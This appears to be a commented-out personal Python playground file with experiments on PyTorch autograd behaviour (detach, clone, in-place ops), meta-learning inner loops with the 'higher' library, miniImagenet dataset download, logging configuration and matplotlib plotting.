# root = '~/tmp/' # dir to place downloaded file in
# download_file_from_google_drive(file_id, root, filename)
#
#
# def extract():
# from torchvision.datasets.utils import extract_archive
# from_path = os.path.expanduser('~/Downloads/miniImagenet.tgz')
# extract_archive(from_path)
#
#
# def download_and_extract_miniImagenet(root):
# import os
# from torchvision.datasets.utils import download_file_from_google_drive, extract_archive
#
# ## download miniImagenet
# # url = 'https://drive.google.com/file/d/1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
# file_id = '1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
# filename = 'miniImagenet.tgz'
# download_file_from_google_drive(file_id, root, filename)
# fpath = os.path.join(root, filename) # this is what download_file_from_google_drive does
# ## extract downloaded dataset
# from_path = os.path.expanduser(fpath)
# extract_archive(from_path)
# ## remove the zip file
# os.remove(from_path)
#
#
# def torch_concat():
# import torch
#
# g1 = torch.randn(3, 3)
# g2 = torch.randn(3, 3)
#
#
# def inner_loop1():
# n_inner_iter = 5
# inner_opt = torch.optim.SGD(net.parameters(), lr=1e-1)
#
# qry_losses = []
# qry_accs = []
# meta_opt.zero_grad()
# for i in range(task_num):
# with higher.innerloop_ctx(
# net, inner_opt, copy_initial_weights=False
# ) as (fnet, diffopt):
# # Optimize the likelihood of the support set by taking
# # gradient steps w.r.t. the model's parameters.
# # This adapts the model's meta-parameters to the task.
# # higher is able to automatically keep copies of
# # your network's parameters as they are being updated.
# for _ in range(n_inner_iter):
# spt_logits = fnet(x_spt[i])
# spt_loss = F.cross_entropy(spt_logits, y_spt[i])
# diffopt.step(spt_loss)
#
# # The final set of adapted parameters will induce some
# # final loss and accuracy on the query dataset.
# # These will be used to update the model's meta-parameters.
# qry_logits = fnet(x_qry[i])
# qry_loss = F.cross_entropy(qry_logits, y_qry[i])
# qry_losses.append(qry_loss.detach())
# qry_acc = (qry_logits.argmax(
# dim=1) == y_qry[i]).sum().item() / querysz
# qry_accs.append(qry_acc)
#
# # Update the model's meta-parameters to optimize the query
# # losses across all of the tasks sampled in this batch.
# # This unrolls through the gradient steps.
# qry_loss.backward()
#
# meta_opt.step()
# qry_losses = sum(qry_losses) / task_num
# qry_accs = 100. * sum(qry_accs) / task_num
# i = epoch + float(batch_idx) / n_train_iter
# iter_time = time.time() - start_time
#
#
# def inner_loop2():
# n_inner_iter = 5
# inner_opt = torch.optim.SGD(net.parameters(), lr=1e-1)
#
# qry_losses = []
# qry_accs = []
# meta_opt.zero_grad()
# meta_loss = 0
# for i in range(task_num):
# with higher.innerloop_ctx(
# net, inner_opt, copy_initial_weights=False
# ) as (fnet, diffopt):
# # Optimize the likelihood of the support set by taking
# # gradient steps w.r.t. the model's parameters.
# # This adapts the model's meta-parameters to the task.
# # higher is able to automatically keep copies of
# # your network's parameters as they are being updated.
# for _ in range(n_inner_iter):
# spt_logits = fnet(x_spt[i])
# spt_loss = F.cross_entropy(spt_logits, y_spt[i])
# diffopt.step(spt_loss)
#
# # The final set of adapted parameters will induce some
# # final loss and accuracy on the query dataset.
# # These will be used to update the model's meta-parameters.
# qry_logits = fnet(x_qry[i])
# qry_loss = F.cross_entropy(qry_logits, y_qry[i])
# qry_losses.append(qry_loss.detach())
# qry_acc = (qry_logits.argmax(
# dim=1) == y_qry[i]).sum().item() / querysz
# qry_accs.append(qry_acc)
#
# # Update the model's meta-parameters to optimize the query
# # losses across all of the tasks sampled in this batch.
# # This unrolls through the gradient steps.
# # qry_loss.backward()
# meta_loss += qry_loss
#
# qry_losses = sum(qry_losses) / task_num
# qry_losses.backward()
# meta_opt.step()
# qry_accs = 100. * sum(qry_accs) / task_num
# i = epoch + float(batch_idx) / n_train_iter
# iter_time = time.time() - start_time
#
#
# def error_unexpected_way_to_by_pass_safety():
# # https://stackoverflow.com/questions/62415251/why-am-i-able-to-change-the-value-of-a-tensor-without-the-computation-graph-know
#
# import torch
# a = torch.tensor([1, 2, 3.], requires_grad=True)
# # are detached tensor's leafs? yes they are
# a_detached = a.detach()
# # a.fill_(2) # illegal, warns you that a tensor which requires grads is used in an inplace op (so it won't be recorded in computation graph so it wont take the right derivative of the forward path as this op won't be in it)
# a_detached.fill_(
# 2) # weird that this one is allowed, seems to allow me to bypass the error check from the previous comment...?!
# print(f'a = {a}')
# print(f'a_detached = {a_detached}')
# a.sum().backward()
#
#
# def detach_playground():
# import torch
#
# a = torch.tensor([1, 2, 3.], requires_grad=True)
# # are detached tensor's leafs? yes they are
# a_detached = a.detach()
# print(f'a_detached.is_leaf = {a_detached.is_leaf}')
# # is doing sum on the detached tensor a leaf? no
# a_detached_sum = a.sum()
# print(f'a_detached_sum.is_leaf = {a_detached_sum.is_leaf}')
# # is detaching an intermediate tensor a leaf? yes
# a_sum_detached = a.sum().detach()
# print(f'a_sum_detached.is_leaf = {a_sum_detached.is_leaf}')
# # shows they share they same data
# print(f'a == a_detached = {a == a_detached}')
# print(f'a is a_detached = {a is a_detached}')
# a_detached.zero_()
# print(f'a = {a}')
# print(f'a_detached = {a_detached}')
# # a.fill_(2) # illegal, warns you that a tensor which requires grads is used in an inplace op (so it won't be recorded in computation graph so it wont take the right derivative of the forward path as this op won't be in it)
# a_detached.fill_(
# 2) # weird that this one is allowed, seems to allow me to bypass the error check from the previous comment...?!
# print(f'a = {a}')
# print(f'a_detached = {a_detached}')
# ## conclusion: detach basically creates a totally new tensor which cuts gradient computations to the original but shares the same memory with original
# out = a.sigmoid()
# out_detached = out.detach()
# out_detached.zero_()
# out.sum().backward()
#
#
# def clone_playground():
# import torch
#
# a = torch.tensor([1, 2, 3.], requires_grad=True)
# a_clone = a.clone()
# print(f'a_clone.is_leaf = {a_clone.is_leaf}')
# print(f'a is a_clone = {a is a_clone}')
# print(f'a == a_clone = {a == a_clone}')
# print(f'a = {a}')
# print(f'a_clone = {a_clone}')
# # a_clone.fill_(2)
# a_clone.mul_(2)
# print(f'a = {a}')
# print(f'a_clone = {a_clone}')
# a_clone.sum().backward()
# print(f'a.grad = {a.grad}')
#
#
# def clone_vs_deepcopy():
# import copy
# import torch
#
# x = torch.tensor([1, 2, 3.])
# x_clone = x.clone()
# x_deep_copy = copy.deepcopy(x)
# #
# x.mul_(-1)
# print(f'x = {x}')
# print(f'x_clone = {x_clone}')
# print(f'x_deep_copy = {x_deep_copy}')
# print()
#
#
# def inplace_playground():
# import torch
#
# x = torch.tensor([1, 2, 3.], requires_grad=True)
# y = x + 1
# print(f'x.is_leaf = {x.is_leaf}')
# print(f'y.is_leaf = {y.is_leaf}')
# x += 1 # not allowed because x is a leaf, since changing the value of a leaf with an inplace forgets it's value then backward wouldn't work IMO (though its not the official response)
# print(f'x.is_leaf = {x.is_leaf}')
#
#
# def copy_initial_weights_playground_original():
# import torch
# import torch.nn as nn
# import torch.optim as optim
# import higher
# import numpy as np
#
# np.random.seed(1)
# torch.manual_seed(3)
# N = 100
# actual_multiplier = 3.5
# meta_lr = 0.00001
# loops = 5 # how many iterations in the inner loop we want to do
#
# x = torch.tensor(np.random.random((N, 1)), dtype=torch.float64) # features for inner training loop
# y = x * actual_multiplier # target for inner training loop
# model = nn.Linear(1, 1, bias=False).double() # simplest possible model - multiple input x by weight w without bias
# meta_opt = optim.SGD(model.parameters(), lr=meta_lr, momentum=0.)
#
# def run_inner_loop_once(model, verbose, copy_initial_weights):
# lr_tensor = torch.tensor([0.3], requires_grad=True)
# momentum_tensor = torch.tensor([0.5], requires_grad=True)
# opt = optim.SGD(model.parameters(), lr=0.3, momentum=0.5)
# with higher.innerloop_ctx(model, opt, copy_initial_weights=copy_initial_weights,
# override={'lr': lr_tensor, 'momentum': momentum_tensor}) as (fmodel, diffopt):
# for j in range(loops):
# if verbose:
# print('Starting inner loop step j=={0}'.format(j))
# print(' Representation of fmodel.parameters(time={0}): {1}'.format(j, str(
# list(fmodel.parameters(time=j)))))
# print(' Notice that fmodel.parameters() is same as fmodel.parameters(time={0}): {1}'.format(j, (
# list(fmodel.parameters())[0] is list(fmodel.parameters(time=j))[0])))
# out = fmodel(x)
# if verbose:
# print(
# ' Notice how `out` is `x` multiplied by the latest version of weight: {0:.4} * {1:.4} == {2:.4}'.format(
# x[0, 0].item(), list(fmodel.parameters())[0].item(), out[0].item()))
# loss = ((out - y) ** 2).mean()
# diffopt.step(loss)
#
# if verbose:
# # after all inner training let's see all steps' parameter tensors
# print()
# print("Let's print all intermediate parameters versions after inner loop is done:")
# for j in range(loops + 1):
# print(' For j=={0} parameter is: {1}'.format(j, str(list(fmodel.parameters(time=j)))))
# print()
#
# # let's imagine now that our meta-learning optimization is trying to check how far we got in the end from the actual_multiplier
# weight_learned_after_full_inner_loop = list(fmodel.parameters())[0]
# meta_loss = (weight_learned_after_full_inner_loop - actual_multiplier) ** 2
# print(' Final meta-loss: {0}'.format(meta_loss.item()))
# meta_loss.backward() # will only propagate gradient to original model parameter's `grad` if copy_initial_weight=False
# if verbose:
# print(' Gradient of final loss we got for lr and momentum: {0} and {1}'.format(lr_tensor.grad,
# momentum_tensor.grad))
# print(
# ' If you change number of iterations "loops" to much larger number final loss will be stable and the values above will be smaller')
# return meta_loss.item()
#
# print('=================== Run Inner Loop First Time (copy_initial_weights=True) =================\n')
# meta_loss_val1 = run_inner_loop_once(model, verbose=True, copy_initial_weights=True)
# print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
# list(model.parameters())[0].grad))
#
# print('=================== Run Inner Loop Second Time (copy_initial_weights=False) =================\n')
# meta_loss_val2 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
# print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
# list(model.parameters())[0].grad))
#
# print('=================== Run Inner Loop Third Time (copy_initial_weights=False) =================\n')
# final_meta_gradient = list(model.parameters())[0].grad.item()
# # Now let's double-check `higher` library is actually doing what it promised to do, not just giving us
# # a bunch of hand-wavy statements and difficult to read code.
# # We will do a simple SGD step using meta_opt changing initial weight for the training and see how meta loss changed
# meta_opt.step()
# meta_opt.zero_grad()
# meta_step = - meta_lr * final_meta_gradient # how much meta_opt actually shifted inital weight value
# meta_loss_val3 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
#
#
# def copy_initial_weights_playground():
# import torch
# import torch.nn as nn
# import torch.optim as optim
# import higher
# import numpy as np
#
# np.random.seed(1)
# torch.manual_seed(3)
# N = 100
# actual_multiplier = 3.5 # the parameters we want the model to learn
# meta_lr = 0.00001
# loops = 5 # how many iterations in the inner loop we want to do
#
# x = torch.randn(N, 1) # features for inner training loop
# y = x * actual_multiplier # target for inner training loop
# model = nn.Linear(1, 1,
# bias=False) # model(x) = w*x, simplest possible model - multiple input x by weight w without bias. goal is to w~~actualy_multiplier
# outer_opt = optim.SGD(model.parameters(), lr=meta_lr, momentum=0.)
#
# def run_inner_loop_once(model, verbose, copy_initial_weights):
# lr_tensor = torch.tensor([0.3], requires_grad=True)
# momentum_tensor = torch.tensor([0.5], requires_grad=True)
# inner_opt = optim.SGD(model.parameters(), lr=0.3, momentum=0.5)
# with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=copy_initial_weights,
# override={'lr': lr_tensor, 'momentum': momentum_tensor}) as (fmodel, diffopt):
# for j in range(loops):
# if verbose:
# print('Starting inner loop step j=={0}'.format(j))
# print(' Representation of fmodel.parameters(time={0}): {1}'.format(j, str(
# list(fmodel.parameters(time=j)))))
# print(' Notice that fmodel.parameters() is same as fmodel.parameters(time={0}): {1}'.format(j, (
# list(fmodel.parameters())[0] is list(fmodel.parameters(time=j))[0])))
# out = fmodel(x)
# if verbose:
# print(
# f' Notice how `out` is `x` multiplied by the latest version of weight: {x[0, 0].item()} * {list(fmodel.parameters())[0].item()} == {out[0].item()}')
# loss = ((out - y) ** 2).mean()
# diffopt.step(loss)
#
# if verbose:
# # after all inner training let's see all steps' parameter tensors
# print()
# print("Let's print all intermediate parameters versions after inner loop is done:")
# for j in range(loops + 1):
# print(' For j=={0} parameter is: {1}'.format(j, str(list(fmodel.parameters(time=j)))))
# print()
#
# # let's imagine now that our meta-learning optimization is trying to check how far we got in the end from the actual_multiplier
# weight_learned_after_full_inner_loop = list(fmodel.parameters())[0]
# meta_loss = (weight_learned_after_full_inner_loop - actual_multiplier) ** 2
# print(' Final meta-loss: {0}'.format(meta_loss.item()))
# meta_loss.backward() # will only propagate gradient to original model parameter's `grad` if copy_initial_weight=False
# if verbose:
# print(' Gradient of final loss we got for lr and momentum: {0} and {1}'.format(lr_tensor.grad,
# momentum_tensor.grad))
# print(
# ' If you change number of iterations "loops" to much larger number final loss will be stable and the values above will be smaller')
# return meta_loss.item()
#
# print('=================== Run Inner Loop First Time (copy_initial_weights=True) =================\n')
# meta_loss_val1 = run_inner_loop_once(model, verbose=True, copy_initial_weights=True)
# print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
# list(model.parameters())[0].grad))
#
# print('=================== Run Inner Loop Second Time (copy_initial_weights=False) =================\n')
# meta_loss_val2 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
# print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
# list(model.parameters())[0].grad))
#
# print('=================== Run Inner Loop Third Time (copy_initial_weights=False) =================\n')
# final_meta_gradient = list(model.parameters())[0].grad.item()
# # Now let's double-check `higher` library is actually doing what it promised to do, not just giving us
# # a bunch of hand-wavy statements and difficult to read code.
# # We will do a simple SGD step using meta_opt changing initial weight for the training and see how meta loss changed
# outer_opt.step()
# outer_opt.zero_grad()
# meta_step = - meta_lr * final_meta_gradient # how much meta_opt actually shifted inital weight value
# meta_loss_val3 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
#
# meta_loss_gradient_approximation = (meta_loss_val3 - meta_loss_val2) / meta_step
#
# print()
# print(
# 'Side-by-side meta_loss_gradient_approximation and gradient computed by `higher` lib: {0:.4} VS {1:.4}'.format(
# meta_loss_gradient_approximation, final_meta_gradient))
#
#
# def tqdm_torchmeta():
# from torchvision.transforms import Compose, Resize, ToTensor
#
# import torchmeta
# from torchmeta.datasets.helpers import miniimagenet
#
# from pathlib import Path
# from types import SimpleNamespace
#
# from tqdm import tqdm
#
# ## get args
# args = SimpleNamespace(episodes=5, n_classes=5, k_shot=5, k_eval=15, meta_batch_size=1, n_workers=4)
# args.data_root = Path("~/automl-meta-learning/data/miniImagenet").expanduser()
#
# ## get meta-batch loader
# train_transform = Compose([Resize(84), ToTensor()])
# dataset = miniimagenet(
# args.data_root,
# ways=args.n_classes,
# shots=args.k_shot,
# test_shots=args.k_eval,
# meta_split='train',
# download=False)
# dataloader = torchmeta.utils.data.BatchMetaDataLoader(
# dataset,
# batch_size=args.meta_batch_size,
# num_workers=args.n_workers)
#
# with tqdm(dataset):
# print(f'len(dataloader)= {len(dataloader)}')
# for episode, batch in enumerate(dataloader):
# print(f'episode = {episode}')
# train_inputs, train_labels = batch["train"]
# print(f'train_labels[0] = {train_labels[0]}')
# print(f'train_inputs.size() = {train_inputs.size()}')
# pass
# if episode >= args.episodes:
# break
#
#
# # if __name__ == "__main__":
# # start = time.time()
# # print('pytorch playground!')
# # # params_in_comp_graph()
# # # check_if_tensor_is_detached()
# # # deep_copy_issue()
# # # download_mini_imagenet()
# # # extract()
# # # download_and_extract_miniImagenet(root='~/tmp')
# # # download_and_extract_miniImagenet(root='~/automl-meta-learning/data')
# # # torch_concat()
# # # detach_vs_cloe()
# # # error_unexpected_way_to_by_pass_safety()
# # # clone_playground()
# # # inplace_playground()
# # # clone_vs_deepcopy()
# # # copy_initial_weights_playground()
# # tqdm_torchmeta()
# # print('--> DONE')
# # time_passed_msg, _, _, _ = report_times(start)
# # print(f'--> {time_passed_msg}')
#
# # %%
#
# import sys
#
# print(sys.version) ##
# print(sys.path)
#
#
# def helloworld():
# print('helloworld')
# print('hello12345')
#
#
# def union_dicts():
# d1 = {'x': 1}
# d2 = {'y': 2, 'z': 3}
# d_union = {**d1, **d2}
# print(d_union)
#
#
# def get_stdout_old():
# import sys
#
# # contents = ""
# # #with open('some_file.txt') as f:
# # #with open(sys.stdout,'r') as f:
# # # sys.stdout.mode = 'r'
# # for line in sys.stdout.readlines():
# # contents += line
# # print(contents)
#
# # print(sys.stdout)
# # with open(sys.stdout.buffer) as f:
# # print(f.readline())
#
# # import subprocess
#
# # p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# # stdout = []
# # while True:
# # line = p.stdout.readline()
# # stdout.append(line)
# # print( line )
# # if line == '' and p.poll() != None:
# # break
# # print( ''.join(stdout) )
#
# import sys
# myfile = "input.txt"
#
# def print(*args):
# __builtins__.print(*args, file=sys.__stdout__)
# with open(myfile, "a+") as f:
# __builtins__.print(*args, file=f)
#
# print('a')
# print('b')
# print('c')
#
# repr(sys.stdout)
#
#
# def get_stdout():
# import sys
# myfile = "my_stdout.txt"
#
# # redefine print
# def print(*args):
# __builtins__.print(*args, file=sys.__stdout__) # prints to terminal
# with open(myfile, "a+") as f:
# __builtins__.print(*args, file=f) # saves in a file
#
# print('a')
# print('b')
# print('c')
#
#
# def logging_basic():
# import logging
# logging.warning('Watch out!') # will print a message to the console
# logging.info('I told you so') # will not print anything
#
#
# def logging_to_file():
# import logging
# logging.basicConfig(filename='example.log', level=logging.DEBUG)
# # logging.
# logging.debug('This message should go to the log file')
# logging.info('So should this')
# logging.warning('And this, too')
#
#
# def logging_to_file_INFO_LEVEL():
# import logging
# import sys
# format = '{asctime}:{levelname}:{name}:lineno {lineno}:{message}'
# logging.basicConfig(filename='example.log', level=logging.INFO, format=format, style='{')
# # logging.basicConfig(stream=sys.stdout,level=logging.INFO,format=format,style='{')
# # logging.
# logging.debug('This message should NOT go to the log file')
# logging.info('This message should go to log file')
# logging.warning('This, too')
#
#
# def logger_SO_print_and_write_to_my_stdout():
# """My sample logger code to print to screen and write to file (the same thing).
#
# Note: trying to replace this old answer of mine using a logger:
# - https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
#
# Credit:
# - https://www.youtube.com/watch?v=jxmzY9soFXg&t=468s
# - https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
# - https://stackoverflow.com/questions/21494468/about-notset-in-python-logging/21494716#21494716
#
# Other resources:
# - https://docs.python-guide.org/writing/logging/
# - https://docs.python.org/3/howto/logging.html#logging-basic-tutorial
# - https://stackoverflow.com/questions/61084916/how-does-one-make-an-already-opened-file-readable-e-g-sys-stdout/61255375#61255375
# """
# from pathlib import Path
# import logging
# import os
# import sys
# from datetime import datetime
#
# ## create directory (& its parents) if it does not exist otherwise do nothing :)
# # get current time
# current_time = datetime.now().strftime('%b%d_%H-%M-%S')
# logs_dirpath = Path(f'~/logs/python_playground_logs_{current_time}/').expanduser()
# logs_dirpath.mkdir(parents=True, exist_ok=True)
# my_stdout_filename = logs_dirpath / Path('my_stdout.log')
# # remove my_stdout if it exists (note you can also just create a new log dir/file each time or append to the end of the log file your using)
# # os.remove(my_stdout_filename) if os.path.isfile(my_stdout_filename) else None
#
# ## create top logger
# logger = logging.getLogger(
# __name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
# logger.setLevel(
# logging.DEBUG) # note: use logging.DEBUG, CAREFUL with logging.UNSET: https://stackoverflow.com/questions/21494468/about-notset-in-python-logging/21494716#21494716
#
# ## log to my_stdout.log file
# file_handler = logging.FileHandler(filename=my_stdout_filename)
# # file_handler.setLevel(logging.INFO) # not setting it means it inherits the logger. It will log everything from DEBUG upwards in severity to this handler.
# log_format = "{asctime}:{levelname}:{lineno}:{name}:{message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
# formatter = logging.Formatter(fmt=log_format, style='{') # set the logging format at for this handler
# file_handler.setFormatter(fmt=formatter)
#
# ## log to stdout/screen
# stdout_stream_handler = logging.StreamHandler(
# stream=sys.stdout) # default stderr, though not sure the advatages of logging to one or the other
# # stdout_stream_handler.setLevel(logging.INFO) # Note: having different set levels means that we can route using a threshold what gets logged to this handler
# log_format = "{name}:{levelname}:-> {message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
# formatter = logging.Formatter(fmt=log_format, style='{') # set the logging format at for this handler
# stdout_stream_handler.setFormatter(fmt=formatter)
#
# logger.addHandler(hdlr=file_handler) # add this file handler to top logger
# logger.addHandler(hdlr=stdout_stream_handler) # add this file handler to top logger
#
# logger.log(logging.NOTSET, 'notset')
# logger.debug('debug')
# logger.info('info')
# logger.warning('warning')
# logger.error('error')
# logger.critical('critical')
#
#
# def logging_unset_level():
# """My sample logger explaining UNSET level
#
# Resources:
# - https://stackoverflow.com/questions/21494468/about-notset-in-python-logging
# - https://www.youtube.com/watch?v=jxmzY9soFXg&t=468s
# - https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
# """
# import logging
#
# logger = logging.getLogger(
# __name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
# print(f'DEFAULT VALUE: logger.level = {logger.level}')
#
# file_handler = logging.FileHandler(filename='my_log.log')
# log_format = "{asctime}:{levelname}:{lineno}:{name}:{message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
# formatter = logging.Formatter(fmt=log_format, style='{')
# file_handler.setFormatter(fmt=formatter)
#
# stdout_stream_handler = logging.StreamHandler(stream=sys.stdout)
# stdout_stream_handler.setLevel(logging.INFO)
# log_format = "{name}:{levelname}:-> {message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
# formatter = logging.Formatter(fmt=log_format, style='{')
# stdout_stream_handler.setFormatter(fmt=formatter)
#
# logger.addHandler(hdlr=file_handler)
# logger.addHandler(hdlr=stdout_stream_handler)
#
# logger.log(logging.NOTSET, 'notset')
# logger.debug('debug')
# logger.info('info')
# logger.warning('warning')
# logger.error('error')
# logger.critical('critical')
#
#
# def logger():
# from pathlib import Path
# import logging
#
# # create directory (& its parents) if it does not exist otherwise do nothing :)
# logs_dirpath = Path('~/automl-meta-learning/logs/python_playground_logs/').expanduser()
# logs_dirpath.mkdir(parents=True, exist_ok=True)
# my_stdout_filename = logs_dirpath / Path('my_stdout.log')
# # remove my_stdout if it exists (used to have this but now I decided to create a new log & file each)
# # os.remove(my_stdout_filename) if os.path.isfile(my_stdout_filename) else None
#
# logger = logging.getLogger(
# __name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
# logger.setLevel(logging.INFO)
#
# log_format = "{asctime}:{levelname}:{name}:{message}"
# formatter = logging.Formatter(fmt=log_format, style='{')
#
# file_handler = logging.FileHandler(filename=my_stdout_filename)
# file_handler.setFormatter(fmt=formatter)
#
# logger.addHandler(hdlr=file_handler)
# logger.addHandler(hdlr=logging.StreamHandler())
#
# for i in range(3):
# logger.info(f'i = {i}')
#
# logger.info(f'logger DONE')
#
#
# def logging_example_from_youtube():
# """https://github.com/CoreyMSchafer/code_snippets/blob/master/Logging-Advanced/employee.py
# """
# import logging
# import pytorch_playground # has employee class & code
# import sys
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.DEBUG)
#
# formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s:%(message)s')
#
# file_handler = logging.FileHandler('sample.log')
# file_handler.setLevel(logging.ERROR)
# file_handler.setFormatter(formatter)
#
# stream_handler = logging.StreamHandler()
# stream_handler.setFormatter(formatter)
#
# logger.addHandler(file_handler)
# logger.addHandler(stream_handler)
#
# logger.critical('not really critical :P')
#
# def add(x, y):
# """Add Function"""
# return x + y
#
# def subtract(x, y):
# """Subtract Function"""
# return x - y
#
# def multiply(x, y):
# """Multiply Function"""
# return x * y
#
# def divide(x, y):
# """Divide Function"""
# try:
# result = x / y
# except ZeroDivisionError:
# logger.exception('Tried to divide by zero')
# else:
# return result
#
# logger.info(
# 'testing if log info is going to print to screen. it should because everything with debug or above is printed since that stream has that level.')
#
# num_1 = 10
# num_2 = 0
#
# add_result = add(num_1, num_2)
# logger.debug('Add: {} + {} = {}'.format(num_1, num_2, add_result))
#
# sub_result = subtract(num_1, num_2)
# logger.debug('Sub: {} - {} = {}'.format(num_1, num_2, sub_result))
#
# mul_result = multiply(num_1, num_2)
# logger.debug('Mul: {} * {} = {}'.format(num_1, num_2, mul_result))
#
# div_result = divide(num_1, num_2)
# logger.debug('Div: {} / {} = {}'.format(num_1, num_2, div_result))
#
#
# def plot():
# """
# source:
# - https://www.youtube.com/watch?v=UO98lJQ3QGI
# - https://github.com/CoreyMSchafer/code_snippets/blob/master/Python/Matplotlib/01-Introduction/finished_code.py
# """
#     from matplotlib import pyplot as plt
#
# plt.xkcd()
#
# ages_x = [18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35,
# 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55]
#
# py_dev_y = [20046, 17100, 20000, 24744, 30500, 37732, 41247, 45372, 48876, 53850, 57287, 63016, 65998, 70003, 70000,
# 71496, 75370, 83640, 84666,
# 84392, 78254, 85000, 87038, 91991, 100000, 94796, 97962, 93302, 99240, 102736, 112285, 100771, 104708,
# 108423, 101407, 112542, 122870, 120000]
# plt.plot(ages_x, py_dev_y, label='Python')
#
# js_dev_y = [16446, 16791, 18942, 21780, 25704, 29000, 34372, 37810, 43515, 46823, 49293, 53437, 56373, 62375, 66674,
# 68745, 68746, 74583, 79000,
# 78508, 79996, 80403, 83820, 88833, 91660, 87892, 96243, 90000, 99313, 91660, 102264, 100000, 100000,
# 91660, 99240, 108000, 105000, 104000]
# plt.plot(ages_x, js_dev_y, label='JavaScript')
#
# dev_y = [17784, 16500, 18012, 20628, 25206, 30252, 34368, 38496, 42000, 46752, 49320, 53200, 56000, 62316, 64928,
# 67317, 68748, 73752, 77232,
# 78000, 78508, 79536, 82488, 88935, 90000, 90056, 95000, 90000, 91633, 91660, 98150, 98964, 100000, 98988,
# 100000, 108923, 105000, 103117]
# plt.plot(ages_x, dev_y, color='#444444', linestyle='--', label='All Devs')
#
# plt.xlabel('Ages')
# plt.ylabel('Median Salary (USD)')
# plt.title('Median Salary (USD) by Age')
#
# plt.legend()
#
# plt.tight_layout()
#
# plt.savefig('plot.png')
#
# plt.show()
#
#
# def subplot():
# """https://github.com/CoreyMSchafer/code_snippets/blob/master/Python/Matplotlib/10-Subplots/finished_code.py
# """
#
# import pandas as pd
#     from matplotlib import pyplot as plt
#
# plt.style.use('seaborn')
#
#     data = pd.read_csv('data.csv')
# ages = data['Age']
# dev_salaries = data['All_Devs']
# py_salaries = data['Python']
# js_salaries = data['JavaScript']
#
# fig1, ax1 = plt.subplots()
# fig2, ax2 = plt.subplots()
#
# ax1.plot(ages, dev_salaries, color='#444444',
# linestyle='--', label='All Devs')
#
# ax2.plot(ages, py_salaries, label='Python')
# ax2.plot(ages, js_salaries, label='JavaScript')
#
# ax1.legend()
# ax1.set_title('Median Salary (USD) by Age')
# ax1.set_ylabel('Median Salary (USD)')
#
# ax2.legend()
# ax2.set_xlabel('Ages')
# ax2.set_ylabel('Median Salary (USD)')
#
# plt.tight_layout()
#
# plt.show()
#
# fig1.savefig('fig1.png')
# fig2.savefig('fig2.png')
#
#
# def import_utils_test():
# import uutils
# import uutils.utils as utils
# from uutils.utils import logger
#
# print(uutils)
# print(utils)
# print(logger)
#
# print()
#
#
# def sys_path():
# """
#
#     python -c "import sys; print(sys.path)"
#
# python -c "import sys; [print(p) for p in sys.path]"
# """
# import sys
#
# def path():
# import sys
# [print(p) for p in sys.path]
#
# for path in sys.path:
# print(path)
#
#
# def pycharm_playground():
# import tqdm
#
# print('running pycharm playground...')
#
# b = 0
# print(b)
# print('Intermediate print line')
# print(b)
# print(b)
# print('Done!')
#
#
# if __name__ == '__main__':
# # union_dicts()
# # get_stdout()
# # logger()
# # logger_SO_print_and_write_to_my_stdout()
# # logging_basic()
# # logging_to_file()
# # logging_to_file()
# # logging_to_file_INFO_LEVEL()
# # logging_example_from_youtube()
# # logging_unset_level()
# # import_utils_test()
# pycharm_playground()
# print('\n---> DONE\a\n\n') ## HIii
#
# # %%
#
# import sys
#
# print(sys.version)
#
# # %%
#
# ## dictionary comprehension looping
#
# d = {'a': 0, 'b': 1}
# lst1 = [f'key:{k}' for k in d]
# lst2 = [f'key:{k}, value:{v}' for k, v in d.items()]
#
# print(lst1)
# print(lst2)
#
# # %%
#
# ## merging two dictionaries
#
# d1 = {'a': 0, 'b': 1}
# d2 = {'c': 2, 'd': 3}
# d3 = {'e': 4, 'f': 5, 'g': 6}
# d = {**d1, **d2, **d3}
#
# print(d)
#
# # %%
#
#
# from collections import OrderedDict
#
# od = OrderedDict([
# ('first', 1)
# ])
#
# print(od)
# od['first'] = 2
# print(od)
#
# lst = sum([i for i in range(3)])
# print(lst)
# od3 = OrderedDict([(i, i) for i in range(3)])
# print(od3)
# print(3 + float('Inf'))
#
# # %%
#
# # import pathlib
# # from pathlib import Path
# #
# #
# # def make_dirpath_current_datetime_hostname(path=None, comment='', replace_dots=True):
# # '''
# # make dir string: runs/CURRENT_DATETIME_HOSTNAME
# # '''
# # import socket
# # import os
# # from datetime import datetime
# # # check if root is a PosixPath object
# # if type(path) != pathlib.PosixPath and path is not None:
# # path = Path(path)
# # current_time = datetime.now().strftime('%b%d_%H-%M-%S')
# # log_dir = os.path.join('runs', current_time + '_' + socket.gethostname() + comment)
# # log_dir = Path(log_dir)
# # print(log_dir._str)
# # if replace_dots:
# # log_dir = Path(log_dir._str.replace('.', '_'))
# # if path is not None:
# # log_dir = path / log_dir
# # return log_dir
# #
# #
# # print(type(Path('~')) == pathlib.PosixPath)
# # print()
# #
# # log_dir = make_dirpath_current_datetime_hostname()
# # print(log_dir)
# # log_dir = make_dirpath_current_datetime_hostname('~')
# # print(log_dir)
